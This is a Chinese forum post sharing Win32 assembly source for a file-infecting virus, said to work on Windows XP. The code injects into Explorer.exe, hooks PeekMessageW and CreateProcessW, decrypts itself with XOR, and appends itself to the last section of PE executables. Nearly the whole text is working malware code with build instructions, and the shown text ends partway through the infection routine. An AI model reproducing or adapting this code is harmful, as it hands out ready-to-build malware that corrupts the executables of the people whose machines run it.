代码放送【Win32 病毒汇编源码,WinXP下调试通过】
本帖最后由 xieglt 于 2016-11-19 23:31 编辑病毒简介:
本病毒搜索系统进程,搜到进程 Explorer.exe 后,将部分病毒代码注入到 Explorer.exe 的进程空间,
且挂接APIPeekMessageW,PeekMessageW 函数时刻都在执行,因此病毒代码将立刻获取控制权。
然后将事先建立的内存映射文件打开,挂接APICreateProcessW 函数。
然后,当你想通过 explorer.exe 运行程序时,就会弹出如下对话框了。
当你点击“取消”时,你想要运行的程序将不会执行,当然,也不会感染程序。
当你输入密码错误时,将弹出如下消息框
你若选择是,将感染你的程序。
当你输入密码正确时,将弹出如下消息框,不感染文件,直接执行
如要测试,请注意以上说明。
密码是123456abcdef
下面一个是病毒代码。可以存成文件 Virus.asm
一个是头文件 可以存成文件 Virus.inc
请用 Tasm32 , tLink32 编译链接 .386
.MODEL FLAT
;包含头文件, Windows 结构申明
INCLUDE Virus.INC
INCLUDE WINDOWS.INC
INCLUDELIB IMPORT32.LIB
;病毒代码的大小
SIZE_OF_CODE = OFFSET _CodeTail - OFFSET _CodeHead
SELF_KEY_OFF = OFFSET selfFlag - OFFSET _CodeHead + 1
SIZE_OF_STR = OFFSET _BaseProcNameTail - OFFSET szGetProcAddress
;_NewStart相对于 _CodeHead 的偏移
NEW_START_OFF = OFFSET _NewStart - OFFSET _CodeHead
SIZE_OF_ENCODE = SIZE_OF_CODE - NEW_START_OFF
;PeekMessageW Hook 函数的大小
SIZE_OF_HOOK = OFFSET _PeekMessageW_HookTail - OFFSET _PeekMessageW_Hook
;CreateProcessW Hook 函数相对于 _CodeHead 的偏移
CPW_HOOK_OFF = OFFSET _CreateProcessW_Hook - OFFSET _CodeHead
;CreateProcessW 挂接代码 相对于 _CodeHead 的偏移
CPW_CODE_OFF = OFFSET CPW_NewCode - OFFSET _CodeHead
SIZE_OF_EPC = OFFSET @f - OFFSET @a
IDC_EDIT_PASSWORD EQU 1000
IDC_BUTTON_OK EQU 1001
IDC_BUTTON_CANCEL EQU 1002
SIZE_OF_TEMPLATE = OFFSET _TemplateEnd - OFFSET _TemplateBegin
EXTRN VirtualProtect:PROC
EXTRN ExitProcess:PROC
EXTRN MessageBoxA:PROC
.DATA
ddBuffer DD 0
szMsg DB "正常退出!",0
.CODE
_PushAddress MACROaddress
PUSH OFFSET address
ADD DWORD PTR ,EBX
ENDM
_Main:
;当代码从本体开始执行时,必须先更改
;代码的页面保护属性
PUSH OFFSET ddBuffer
PUSH PAGE_EXECUTE_READWRITE
PUSH 04000H
PUSH OFFSET _Main
CALL VirtualProtect
PUSH 0
JMP _CodeHead
ALIGN 4
;病毒代码开始
_CodeHead:
NOP
PUSH EBP
MOV EBP,ESP
NOP
JZ _Start
JNZ _Start
selfFlag DB 0
szGetProcAddress DB "GetProcAddress",0
szCreateFileMappingA DB "CreateFileMappingA",0
szMapViewOfFile DB "MapViewOfFile",0
szGetLastError DB "GetLastError",0
szVirtualProtect0 DB "VirtualProtect",0,0
szMapFileName DB "LongliveChairmanMao",0
_BaseProcNameTail:
ALIGN 4
_Start:
SUB ESP,64
PUSHAD
CALL _MainDelta
_MainDelta:
POP EBX
SUB EBX,OFFSET _MainDelta
JZ _Continue
JNZ _Continue
;退出代码
_IsNotSelf:
MOV EAX,DWORD PTR
TEST EAX,EAX
JE _ErrorSerious
PUSH EBP
SUB DWORD PTR ,48
PUSH PAGE_EXECUTE_READWRITE
PUSH 2000H
PUSH EAX
CALL DWORD PTR
TEST EAX,EAX
JE _ErrorSerious
MOV EDI,DWORD PTR
SUB EDI,5
MOV AL,dbDecodeKey
LEA ESI,@f
PUSH SIZE_OF_EPC
POP ECX
PUSH ECX
PUSH ESI
_DecodeEntryPoint:
XOR BYTE PTR ,AL
INC ESI
LOOP _DecodeEntryPoint
POP ESI
POP ECX
MOV EAX,EDI
REP MOVSB
LEA EDI,_GotoEntryPoint
INC EDI
STOSD
; POP DWORD PTR FS:
; ADD ESP,4
POPAD
MOV ESP,EBP
POP EBP
ADD ESP,4
_GotoEntryPoint:
MOV EAX,0FFFFFFFFH
JMP EAX
_ErrorSerious:
; 严重错误发生,结束程序
; POP DWORD PTR FS:
; ADD ESP,4
POPAD
MOV ESP,EBP
POP EBP
ADD ESP,4
RET
PUSH 0
CALL ExitProcess
dbDecodeKey DB 0
_Continue:
; old EBP
; kernel32.dll module
; GetProcAddress
; CreateFileMappingA
; MapViewOfFile
; GetLastError
; VirtualProtect
; Mapping file Handle
; view of mapping file
MOV EAX,DWORD PTR
OR ECX,0FFFFFFFFH
MOV EDI,EAX
SHR EDI,1
SHL EDI,1
STD
_ModuleHeaderNotFound:
MOV AX,NT_SIGN
REPNE SCASW
MOV EDX,EDI
INC EDX
INC EDX
MOV AX,DOS_SIGN
REPNE SCASW
INC EDI
INC EDI
MOV EAX,.IDH_lfanew
ADD EAX,EDI
XOR EAX,EDX
JZ _ModuleHeaderIsFound
MOV EDI,EDX
DEC EDI
DEC EDI
JMP _ModuleHeaderNotFound
_ModuleHeaderIsFound:
CLD
MOV DWORD PTR ,EDI
LEA ESI,selfFlag
XOR EAX,EAX
LODSB
LEA ECX,_BaseProcNameTail
SUB ECX,ESI
_FirstDecode:
XOR BYTE PTR ,AL
INC ESI
LOOP _FirstDecode
MOV EAX,EDI
ADD EDI,.IDH_lfanew
MOV EDI,.INH_OptionalHeader.IOH_DataDirectory.IDD_VirtualAddress
ADD EDI,EAX
MOV ECX,.IED_AddressOfNameOrdinals
ADD ECX,EAX
MOV DWORD PTR ,ECX
MOV ECX,.IED_AddressOfFunctions
ADD ECX,EAX
MOV DWORD PTR ,ECX
MOV ECX,.IED_NumberOfNames
MOV DWORD PTR ,ECX
MOV ESI,.IED_Name
ADD ESI,EAX
LEA EDI,szGetProcAddress
XOR EAX,EAX
XOR ECX,ECX
DEC ECX
REPNE SCASB
NOT ECX
MOV DWORD PTR ,ECX
SUB EDI,ECX
XCHG EDI,ESI
XOR EDX,EDX
_CheckStringLength:
INC EDX
CMP EDX,DWORD PTR
JG _ErrorSerious
XOR ECX,ECX
DEC ECX
REPNE SCASB
NOT ECX
CMP ECX,DWORD PTR
JNE _CheckStringLength
SUB EDI,ECX
PUSH ESI
REPE CMPSB
POP ESI
JCXZ _ProcIsFound
ADD EDI,ECX
JMP _checkStringLength
_ProcIsFound:
DEC EDX
DEC EDX
MOV EDI,DWORD PTR
SHL EDX,1
MOV DX,WORD PTR
AND EDX,0FFFFH
SHL EDX,2
MOV EDI,DWORD PTR
MOV EAX,DWORD PTR
ADD EAX,DWORD PTR
MOV DWORD PTR ,EAX
MOV ESI,EBP
SUB ESI,12
LEA EDI,szCreateFileMappingA
_GetBaseAPIs:
PUSH EDI
PUSH DWORD PTR
CALL DWORD PTR
TEST EAX,EAX
JE _ErrorSerious
MOV DWORD PTR ,EAX
SUB ESI,4
XOR EAX,EAX
XOR ECX,ECX
DEC ECX
REPNE SCASB
MOV AL,BYTE PTR
TEST EAX,EAX
JNE _GetBaseAPIs
_PushAddress szMapFileName
PUSH 010000H
PUSH 0
PUSH PAGE_EXECUTE_READWRITE
PUSH NULL
PUSH -1
CALL DWORD PTR
TEST EAX,EAX
JE _ErrorSerious
MOV DWORD PTR ,EAX
CALL DWORD PTR
CMP EAX,ERROR_ALREADY_EXISTS
JE _IsNotSelf
PUSH 0
PUSH 0
PUSH 0
PUSH FILE_MAP_WRITE
PUSH DWORD PTR
CALL DWORD PTR
TEST EAX,EAX
JE _ErrorSerious
MOV DWORD PTR ,EAX
MOV EDI,EAX
LEA ESI,_CodeHead
MOV ECX,SIZE_OF_CODE
PUSH EDI
REP MOVSB
POP EDI
ADD EDI,NEW_START_OFF
MOV AL,dbDecodeKey
PUSH SIZE_OF_ENCODE
POP ECX
_SecondDecode:
XOR BYTE PTR ,AL
INC EDI
LOOP _SecondDecode
_PushAddress _IsNotSelf
PUSH NEW_START_OFF
POP EAX
ADD EAX,DWORD PTR
JMP EAX
_NewStart:
PUSH EBX
CALL _NewDelta
_NewDelta:
POP EBX
SUB EBX,OFFSET _NewDelta
PUSH DWORD PTR
POP ddCreateFileMappingA
;获得Kernel32.dll中需要用到的API
_PushAddress ddLoadLibraryA
_PushAddress szLoadLibraryA
PUSH DWORD PTR
PUSH DWORD PTR
CALL _GetAllProc
TEST EAX,EAX
JZ _NewEnd
;获得User32.dll的地址
_PushAddress szUser32
CALL ddLoadLibraryA
TEST EAX,EAX
JZ _NewEnd
;获得User32.dll中需要用到的API
_PushAddress ddMessageBoxA
_PushAddress szMessageBoxA
PUSH DWORD PTR
PUSH EAX
CALL _GetAllProc
TEST EAX,EAX
JZ _NewEnd
;查找进程 Explorer.exe 获得进程ID
_PushAddress szExplorer
CALL _SearchForProcess
TEST EAX,EAX
JZ _NewEnd
;打开进程Explorer.exe以及获得其Module
_PushAddress ddExplorerHandle
_PushAddress ddExplorerModule
PUSH EAX
CALL _OpenProcessAndGetModule
TEST EAX,EAX
JZ _NewEnd
;在进程Explorer.exe中搜索API PeekMessageW的引入地址
PUSH ddPeekMessageW
_PushAddress szUser32
CALL _SearchForImportAPI
TEST EAX,EAX
JZ _NewEnd
MOV DWORD PTR ,EAX
;在进程Explorer.exe中搜索足够写入挂接代码的空闲空间
PUSH SIZE_OF_HOOK
CALL _SearchForFreeSpace
TEST EAX,EAX
JZ _NewEnd
MOV DWORD PTR ,EAX
CALL _PrepareForInject
TEST EAX,EAX
JE _NewEnd
MOV DWORD PTR ,EAX
;将代码注入进程Explorer.exe
PUSH DWORD PTR
PUSH DWORD PTR
CALL _InjectProcess
TEST EAX,EAX
JE _NewEnd
PUSH -1
PUSH DWORD PTR
CALL ddWaitForSingleObject
PUSH DWORD PTR
CALL ddCloseHandle
; _PushAddress szTestFile
; CALL _InfectExeFile
_NewEnd:
POP EBX
RET
;***********************************************************************
; 函数声明:_GetAllProc PROC stdcall,DWORD,DWORD,DWORD,DWORD
;
; 功能:获取全部所需API
;
; 参数: 1:HMODULE of DLLs (Kernel32.dll,user32.dll)
; 2:address of GetProcAddress
; 3:name of APIs
; 4:buffer for store APIs' address
;***********************************************************************
_GetAllProc PROC
PUSH EBP
MOV EBP,ESP
PUSH EBX
PUSH ECX
PUSH ESI
PUSH EDI
MOV EDI,DWORD PTR
MOV ESI,DWORD PTR
_GetOneProc:
PUSH EDI
PUSH DWORD PTR
CALL DWORD PTR
TEST EAX,EAX
JE _GetAllProcExit
XCHG ESI,EDI
STOSD
XCHG ESI,EDI
XOR EAX,EAX
XOR ECX,ECX
DEC ECX
REPNE SCASB
MOV AL,BYTE PTR
TEST EAX,EAX
JNE _GetOneProc
INC EAX
_GetAllProcExit:
POP EDI
POP ESI
POP ECX
POP EBX
MOV ESP,EBP
POP EBP
RET 16
_GetAllProc ENDP
;***********************************************************************
;***********************************************************************
_StringLength PROC
PUSH EBP
MOV EBP,ESP
PUSH ECX
PUSH EDI
MOV EDI,DWORD PTR
XOR EAX,EAX
XOR ECX,ECX
DEC ECX
REPNE SCASB
NOT ECX
MOV EAX,ECX
POP EDI
POP ECX
MOV ESP,EBP
POP EBP
RET 4
_StringLength ENDP
;***********************************************************************
; 函数名称: _UCaseString
; 功能描述: 将一个字符串中的小写字母转换成大写
; 入口参数: EDI = 字符串指针
; 返回值: NONE
; 处理概要: 遍历字符串,当字符>='a' 且 <='z' 时,字符 -= 32
;***********************************************************************
_UCaseString PROC
PUSH EBP
MOV EBP,ESP
PUSH ECX
PUSH EDI
MOV EDI,DWORD PTR
PUSH EDI
CALL _StringLength
MOV ECX,EAX
PUSH ECX
_UCaseLoop:
MOV AL,BYTE PTR
CMP AL,'a'
JL _IsNotLCase
CMP AL,'z'
JG _IsNotLCase
SUB AL,32
_IsNotLCase:
STOSB
LOOP _UCaseLoop
POP EAX
POP EDI
POP ECX
MOV ESP,EBP
POP EBP
RET 4
_UCaseString ENDP
;***********************************************************************
;***********************************************************************
_StringCompare PROC
PUSH EBP
MOV EBP,ESP
PUSH ECX
PUSH ESI
PUSH EDI
MOV EDI,DWORD PTR
MOV ESI,DWORD PTR
PUSH ESI
CALL _UCaseString
MOV ECX,EAX
PUSH EDI
CALL _StringLength
SUB EAX,ECX
JNZ _ExitCompare
REPE CMPSB
JCXZ _ExitCompare
INC EAX
_ExitCompare:
POP EDI
POP ESI
POP ECX
MOV ESP,EBP
POP EBP
RET 8
_StringCompare ENDP
;***********************************************************************
;***********************************************************************
_SearchForProcess PROC
PUSH EBP
MOV EBP,ESP
SUB ESP,8
SUB ESP,SIZE PROCESS_ENTRY32
PUSH EDI
PUSH 0
PUSH TH32CS_SNAPPROCESS
CALL ddCreateToolhelp32Snapshot
TEST EAX,EAX
JE _ErrorProcessSnapshot
MOV DWORD PTR ,EAX
PUSH 0
POP DWORD PTR
MOV EDI,EBP
SUB EDI,8
SUB EDI,SIZE PROCESS_ENTRY32
MOV .PE_dwSize,SIZE PROCESS_ENTRY32
PUSH EDI
PUSH EAX
CALL ddProcess32First
_ContinueSearch:
TEST EAX,EAX
JE _ProcessNotFound
PUSH EDI
ADD DWORD PTR ,36
PUSH DWORD PTR
CALL _StringCompare
TEST EAX,EAX
JE _ProcessIsFound
PUSH EDI
PUSH DWORD PTR
CALL ddProcess32Next
JMP _ContinueSearch
_ProcessIsFound:
PUSH .PE_th32ProcessID
POP DWORD PTR
_ProcessNotFound:
PUSH DWORD PTR
CALL ddCloseHandle
MOV EAX,DWORD PTR
_ErrorProcessSnapshot:
POP EDI
MOV ESP,EBP
POP EBP
RET 4
_SearchForProcess ENDP
;***********************************************************************
;***********************************************************************
_OpenProcessAndGetModule PROC
PUSH EBP
MOV EBP,ESP
SUB ESP,8
SUB ESP,SIZE MODULE_ENTRY32
PUSH EDI
PUSH DWORD PTR
PUSH TH32CS_SNAPMODULE
CALL ddCreateToolhelp32Snapshot
TEST EAX,EAX
JE _ErrorModuleSnapshot
MOV DWORD PTR ,EAX
PUSH 0
POP DWORD PTR
MOV EDI,EBP
SUB EDI,8
SUB EDI,SIZE MODULE_ENTRY32
MOV .PE_dwSize,SIZE MODULE_ENTRY32
PUSH EDI
PUSH EAX
CALL ddModule32First
TEST EAX,EAX
JE _GetModuleError
MOV EAX,DWORD PTR
PUSH .ME_hModule
POP DWORD PTR
PUSH DWORD PTR
PUSH 0
PUSH PROCESS_OPEN_ACCESS
CALL ddOpenProcess
TEST EAX,EAX
JE _GetModuleError
PUSH EAX
MOV EAX,DWORD PTR
POP DWORD PTR
PUSH 1
POP DWORD PTR
_GetModuleError:
PUSH DWORD PTR
CALL ddCloseHandle
MOV EAX,DWORD PTR
_ErrorModuleSnapshot:
POP EDI
MOV ESP,EBP
POP EBP
RET 12
_OpenProcessAndGetModule ENDP
;***********************************************************************
;***********************************************************************
_SearchForImportAPI PROC
PUSH EBP
MOV EBP,ESP
SUB ESP,8
PUSH ECX
PUSH ESI
PUSH EDI
;取得DLL模块名的字符串长
PUSH DWORD PTR
CALL _StringLength
MOV DWORD PTR ,EAX
CALL _ReadProcessNtHeader
TEST EAX,EAX
JE _APINotFound
;读取函数导入表
MOV ESI,EDI
ADD ESI,078H
ADD ESI,SIZE IMAGE_DATA_DIRECTORY
PUSH .IDD_VirtualAddress
POP ESI
ADD ESI,ddExplorerModule
ADD EDI,SIZE IMAGE_NT_HEADERS
_SearchImportTable:
PUSH SIZE IMAGE_IMPORT_DESCRIPTOR
POP ECX
CALL _ReadProcessMemory
TEST EAX,EAX
JE _APINotFound
PUSH .IID_Name
POP EAX
TEST EAX,EAX
JE _APINotFound
PUSH ESI
PUSH EDI
MOV ECX,DWORD PTR
MOV ESI,ddExplorerModule
ADD ESI,EAX
PUSH DWORD PTR .IID_FirstThunk
POP DWORD PTR
CALL _ReadProcessMemory
TEST EAX,EAX
JNE _CheckDllName
ADD ESP,8
JMP _APINotFound
_CheckDllName:
XOR EAX,EAX
PUSH EDI
ADD EDI,DWORD PTR
STOSB
POP EDI
PUSH EDI
PUSH DWORD PTR
CALL _StringCompare
TEST EAX,EAX
JE _ImportTableIsFound
POP EDI
POP ESI
ADD ESI,SIZE IMAGE_IMPORT_DESCRIPTOR
JMP _SearchImportTable
_ImportTableIsFound:
MOV ESI,DWORD PTR
ADD ESI,ddExplorerModule
_SearchThunkData:
PUSH SIZE IMAGE_THUNK_DATA32
POP ECX
CALL _ReadProcessMemory
TEST EAX,EAX
JE _APINotFound
MOV EAX,.ITD_Function
TEST EAX,EAX
JE _APINotFound
SUB EAX,DWORD PTR
JZ _APIIsFound
ADD ESI,SIZE IMAGE_THUNK_DATA32
JMP _SearchThunkData
_APIIsFound:
MOV EAX,ESI
_APINotFound:
POP EDI
POP ESI
POP ECX
MOV ESP,EBP
POP EBP
RET 8
_SearchForImportAPI ENDP
;***********************************************************************
_SearchForFreeSpace PROC
PUSH EBP
MOV EBP,ESP
SUB ESP,8
PUSH ECX
PUSH EDX
PUSH ESI
PUSH EDI
CALL _ReadProcessNtHeader
MOVZX EAX,.INH_FileHeader.IFH_NumberOfSections
MOV DWORD PTR ,EAX
ADD EDI,SIZE IMAGE_NT_HEADERS
ADD ESI,SIZE IMAGE_NT_HEADERS
;计算该Section中的剩余空间
;在磁盘上,PE文件的每个Section的大小总是FileAlignment的整数倍
;这个值存在于 .ISH_SizeOfRawData 中
;在载入内存后,每个Section的大小总是SectionAlignment的整数倍
;所以,剩余空间的计算方法为:
;SizeOfRawData/SectionAlignment
;总空间 = 商*SectionAlignment + (余数 == 0 ? 0 : SectionAlignment)
;剩余空间 = 总空间 - .ISH_VirtualSize
_SearchSectionTable:
PUSH SIZE IMAGE_SECTION_HEADER
POP ECX
CALL _ReadProcessMemory
TEST EAX,EAX
JE _NoFreeSpace
PUSH EDI
MOV EAX,.ISH_SizeOfRawData
SUB EDI,SIZE IMAGE_NT_HEADERS
PUSH .INH_OptionalHeader.IOH_SectionAlignment
POP DWORD PTR
XOR EDX,EDX
DIV DWORD PTR
ADD DX,0FFFFH
ADC EAX,0
MUL DWORD PTR
POP EDI
SUB EAX,.ISH_VirtualSize
CMP EAX,DWORD PTR
JGE _FreeSpaceIsFound
MOV ECX,DWORD PTR
DEC ECX
JCXZ _NoFreeSpace
ADD ESI,SIZE IMAGE_SECTION_HEADER
JMP _SearchSectionTable
_FreeSpaceIsFound:
MOV EAX,ddExplorerModule
ADD EAX,.ISH_VirtualAddress
ADD EAX,.ISH_VirtualSize
_NoFreeSpace:
POP EDI
POP ESI
POP EDX
POP ECX
MOV ESP,EBP
POP EBP
RET 4
_SearchForFreeSpace ENDP
;***********************************************************************
_PrepareForInject PROC
PUSH DWORD PTR
POP DWORD PTR ddMapViewOfFile_Host
PUSH 7
POP ECX
LEA ESI,ddCreateProcessW
LEA EDI,ddCreateProcessW_Host
REP MOVSD
;保存CreateProcessW的原始代码
MOV ESI,ddCreateProcessW
LEA EDI,CPW_OldCode
PUSH 7
POP ECX
REP MOVSB
_PushAddress szEventName
PUSH 0
PUSH 1
PUSH NULL
CALL ddCreateEventA
RET
_PrepareForInject ENDP
;***********************************************************************
_InjectProcess PROC
PUSH EBP
MOV EBP,ESP
SUB ESP,4
PUSH ECX
PUSH ESI
PUSH EDI
;a(c,d) push d,push c call a
;取参数1
MOV EAX,DWORD PTR
AND EAX,0FFFFF000H
PUSH EBP
SUB DWORD PTR ,4
PUSH PAGE_EXECUTE_READWRITE
PUSH 02000H
PUSH EAX
PUSH ddExplorerHandle
CALL ddVirtualProtectEx
TEST EAX,EAX
JE _InJectFailed
PUSH SIZE_OF_HOOK
POP ECX
_PushAddress _PeekMessageW_Hook
POP EDI
PUSH DWORD PTR
POP ESI
CALL _WriteProcessMemory
TEST EAX,EAX
JE _InjectFailed
MOV EAX,DWORD PTR
AND EAX,0FFFFF000H
PUSH EBP
SUB DWORD PTR ,4
PUSH PAGE_EXECUTE_READWRITE
PUSH 02000H
PUSH EAX
PUSH ddExplorerHandle
CALL ddVirtualProtectEx
TEST EAX,EAX
JE _InJectFailed
PUSH 4
POP ECX
MOV EDI,EBP
ADD EDI,8
PUSH DWORD PTR
POP ESI
CALL _WriteProcessMemory
_InjectFailed:
POP EDI
POP ESI
POP ECX
MOV ESP,EBP
POP EBP
RET 8
_InjectProcess ENDP
;***********************************************************************
_ReadProcessNtHeader PROC
;读取EXPLORER.EXE的 DOS 头
PUSH SIZE IMAGE_DOS_HEADER
POP ECX
LEA EDI,ddGlobalBuffer
MOV ESI,ddExplorerModule
CALL _ReadProcessMemory
TEST EAX,EAX
JE _ReadError
;读取EXPLORER.EXE的 NT 头
PUSH SIZE IMAGE_NT_HEADERS
POP ECX
ADD ESI,DWORD PTR .IDH_lfanew
CALL _ReadProcessMemory
_ReadError:
RET
_ReadProcessNtHeader ENDP
;***********************************************************************
; 函数名称: _ReadProcessMemory
; 功能描述: 将API ReadProcessMemory 封装一下
; 入口参数: ECX = 读取字节数
; ESI = 目标进程中的读取地址
; EDI = 读出数据存放的缓冲区
; 返回值: EAX = 0 失败, 1 成功
; 处理概要:
;***********************************************************************
_ReadProcessMemory PROC
PUSH NULL
PUSH ECX
PUSH EDI
PUSH ESI
PUSH ddExplorerHandle
CALL ddReadProcessMemory
RET
_ReadProcessMemory ENDP
;***********************************************************************
; 函数名称: _WriteProcessMemory
; 功能描述: 将API WriteProcessMemory 封装一下
; 入口参数: ECX = 写入字节数
; ESI = 目标进程中的写入地址
; EDI = 写入数据存放的缓冲区
; 返回值: EAX = 0 失败, 1 成功
; 处理概要:
;***********************************************************************
_WriteProcessMemory PROC
PUSH NULL
PUSH ECX
PUSH EDI
PUSH ESI
PUSH ddExplorerHandle
CALL ddWriteProcessMemory
RET
_WriteProcessMemory ENDP
;***********************************************************************
;***********************************************************************
_ShowDWORD PROC
PUSH EBP
MOV EBP,ESP
SUB ESP,12
PUSH EAX
PUSH ECX
PUSH EDI
PUSHF
STD
MOV EDI,EBP
DEC EDI
MOV AL,0
STOSB
MOV AL,'H'
STOSB
MOV EAX,DWORD PTR
MOV ECX,8
_Hex2Ascii:
PUSH EAX
AND AL,0FH
ADD AL,030H
CMP AL,039H
JLE _IsNumber
ADD AL,7
_IsNumber:
STOSB
POP EAX
SHR EAX,4
LOOP _Hex2Ascii
MOV AL,'X'
STOSB
MOV AL,'0'
STOSB
INC EDI
CLD
PUSH 0
PUSH 0
PUSH EDI
PUSH 0
MOV EAX,DWORD PTR
TEST EAX,EAX
JNZ _ProcFromStack
CALL MessageBoxA
JMP _ProcFromImport
_ProcFromStack:
CALL EAX
_ProcFromImport:
POPF
POP EDI
POP ECX
POP EAX
ADD ESP,12
MOV ESP,EBP
POP EBP
RET 8
_ShowDWORD ENDP
;***********************************************************************
_GetExeFileName PROC
PUSH EBP
MOV EBP,ESP
PUSH ECX
PUSH ESI
PUSH EDI
MOV ESI,DWORD PTR
MOV EDI,DWORD PTR
PUSH ESI
CALL _StringLength
MOV ECX,EAX
XOR EAX,EAX
LODSB
SUB AL,022H
XCHG EAX,ECX
JCXZ _DelFirstChar
DEC ESI
_DelFirstChar:
XCHG EAX,ECX
PUSH ECX
REP MOVSB
POP ECX
SUB EDI,ECX
MOV AL,022H
REPNE SCASB
JCXZ _IsLastChar
DEC EDI
MOV BYTE PTR ,0
_IsLastChar:
POP EDI
POP ESI
POP ECX
MOV ESP,EBP
POP EBP
RET 8
_GetExeFileName ENDP
;***********************************************************************
_CPW_OldCodeStore PROC
PUSH 7
POP ECX
MOV EDI,ddCreateProcessW_Host
LEA ESI,CPW_OldCode
REP MOVSB
RET
_CPW_OldCodeStore ENDP
;***********************************************************************
_RandNumber PROC
PUSH EBP
MOV EBP,ESP
PUSH EDX
CALL ddGetTickCount
XOR EDX,EDX
MUL DWORD PTR
ADD EAX,DWORD PTR
ADC EDX,0
DIV DWORD PTR
XCHG EAX,EDX
ADD EAX,1
POP EDX
MOV ESP,EBP
POP EBP
RET 12
_RandNumber ENDP
;***********************************************************************
_Align2Number PROC
PUSH EBP
MOV EBP,ESP
MOV EAX,DWORD PTR
XOR EDX,EDX
DIV DWORD PTR
ADD DX,0FFFFH
ADC EAX,0
MUL DWORD PTR
MOV ESP,EBP
POP EBP
RET 8
_Align2Number ENDP
;***********************************************************************
_IsNotInfect PROC
PUSH EBP
MOV EBP,ESP
SUB ESP,4
PUSH ESI
PUSH EDI
MOV ESI,DWORD PTR
PUSH .INH_OptionalHeader.IOH_AddressOfEntryPoint
PUSH ESI
CALL _GetRawFromRVA
MOV DWORD PTR ,EAX
PUSH 8
POP ECX
MOV ESI,EAX
ADD ESI,DWORD PTR
LEA EDI,_EntryPointCode
REPE CMPSB
JCXZ _LikeIt
XOR EAX,EAX
JMP _IsNotInfectExit
_LikeIt:
LODSD
ADD EAX,5
MOV ESI,DWORD PTR
ADD EAX,.INH_OptionalHeader.IOH_AddressOfEntryPoint
PUSH EAX
PUSH ESI
CALL _GetRawFromRVA
PUSH 5
POP ECX
MOV ESI,EAX
ADD ESI,DWORD PTR
LEA EDI,_CodeHead
XOR EAX,EAX
INC EAX
REPE CMPSB
JCXZ _IsNotInfectExit
DEC EAX
_IsNotInfectExit:
POP EDI
POP ESI
MOV ESP,EBP
POP EBP
RET 8
_IsNotInfect ENDP
;***********************************************************************
_GetNtHeader PROC
MOV WORD PTR AX,.IDH_magic
CMP AX,DOS_SIGN
JNE _InvalidPEFile
;定位到NT头
ADD ESI,.IDH_lfanew
MOV DWORD PTR EAX,.INH_Signature
CMP EAX,NT_SIGN
JNE _InvalidPEFile
MOV EAX,ESI
RET
_InvalidPEFile:
XOR EAX,EAX
RET
_GetNtHeader ENDP
;***********************************************************************
_GetRawFromRVA PROC
PUSH EBP
MOV EBP,ESP
PUSH ECX
PUSH EDX
PUSH ESI
PUSH EDI
MOV ESI,DWORD PTR
MOV EAX,DWORD PTR
MOV EDI,ESI
ADD EDI,SIZE IMAGE_NT_HEADERS
MOVZX ECX,.INH_FileHeader.IFH_NumberOfSections
_SearchForRVA:
MOV EDX,.ISH_VirtualAddress
CMP EAX,EDX
JL _RVANotFound
ADD EDX,.ISH_SizeOfRawData
CMP EAX,EDX
JLE _RVAIsFound
ADD EDI,SIZE IMAGE_SECTION_HEADER
LOOP _SearchForRVA
_RVAIsFound:
SUB EAX,.ISH_VirtualAddress
ADD EAX,.ISH_PointerToRawData
JMP _RawExit
_RVANotFound:
XOR EAX,EAX
_RawExit:
POP EDI
POP ESI
POP EDX
POP ECX
MOV ESP,EBP
POP EBP
RET 8
_GetRawFromRVA ENDP
;***********************************************************************
; 文件属性
; 文件句柄
; 映射文件句柄
; 内存映射指针
; 文件大小(或对齐后大小)
; 病毒代码对齐后大小
; 病毒代码的入口地址
;
;
;
_InfectExeFile PROC
PUSH EBP
MOV EBP,ESP
SUB ESP,36
SUB ESP,SIZE IMAGE_SECTION_HEADER
;取得文件属性
PUSH DWORD PTR
CALL ddGetFileAttributesA
INC EAX
JZ _InfectExit
DEC EAX
MOV DWORD PTR ,EAX
;更改文件属性
PUSH FILE_ATTRIBUTE_ARCHIVE
PUSH DWORD PTR
CALL ddSetFileAttributesA
TEST EAX,EAX
JZ _InfectExit
;打开文件
PUSH NULL
PUSH 0
PUSH OPEN_EXISTING
PUSH NULL
PUSH 0
PUSH GENERIC_READ OR GENERIC_WRITE
PUSH DWORD PTR
CALL ddCreateFileA
INC EAX
JZ _ErrorSetAttributs
DEC EAX
MOV DWORD PTR ,EAX
;取得文件大小
PUSH NULL
PUSH EAX
CALL ddGetFileSize
INC EAX
JZ _ErrorCloseFile
DEC EAX
MOV DWORD PTR ,EAX
;创建内存映射文件
PUSH NULL
PUSH 0
PUSH 0
PUSH PAGE_READWRITE
PUSH NULL
PUSH DWORD PTR
CALL ddCreateFileMappingA
TEST EAX,EAX
JZ _ErrorCloseFile
MOV DWORD PTR ,EAX
;映射内存映射文件
PUSH 0
PUSH 0
PUSH 0
PUSH FILE_MAP_ALL_ACCESS
PUSH EAX
CALL ddMapViewOfFile_Host
TEST EAX,EAX
JZ _ErrorCloseFileMap
MOV DWORD PTR ,EAX
;定位到NT头
MOV ESI,EAX
CALL _GetNtHeader
TEST EAX,EAX
JE _ErrorCloseViewOfMap
PUSH DWORD PTR
PUSH EAX
CALL _IsNotInfect
TEST EAX,EAX
JNE _ErrorCloseViewOfMap
;文件原大小对齐到 fileAlignment
PUSH .INH_OptionalHeader.IOH_FileAlignment
PUSH DWORD PTR
CALL _Align2Number
MOV DWORD PTR ,EAX
;病毒代码大小对齐 fileAlignment
PUSH .INH_OptionalHeader.IOH_FileAlignment
PUSH SIZE_OF_CODE
CALL _Align2Number
MOV DWORD PTR ,EAX
;定位到最后一个节表
;并把节表复制到栈里
PUSH SIZE IMAGE_SECTION_HEADER
POP ECX
MOV EDI,EBP
SUB EDI,36
SUB EDI,ECX
MOVZX EAX,.INH_FileHeader.IFH_NumberOfSections
DEC EAX
MUL ECX
PUSH ESI
ADD ESI,SIZE IMAGE_NT_HEADERS
ADD ESI,EAX
PUSH EDI
REP MOVSB
POP EDI
POP ESI
MOV DWORD PTR ,EDI
;计算最后一个节的原始大小
;原始大小 = 文件大小 - 节开始地址
MOV EAX,DWORD PTR
SUB EAX,.ISH_PointerToRawData
;原始大小对齐到fileAlignment
PUSH .INH_OptionalHeader.IOH_FileAlignment
PUSH EAX
CALL _Align2Number
;计算病毒代码入口地址
;因为病毒代码附加在最后一节的后面
;病毒入口地址 = 节开始虚拟地址 + 最后一节原始大小(对齐后)
;病毒入口地址保存进
PUSH EAX
ADD EAX,.ISH_VirtualAddress
MOV DWORD PTR ,EAX
POP EAX
;计算感染后节大小
;感染后的节大小 = 节原始大小(对齐后) + 感染代码大小(对齐后)
ADD EAX,DWORD PTR
MOV .ISH_SizeOfRawData,EAX
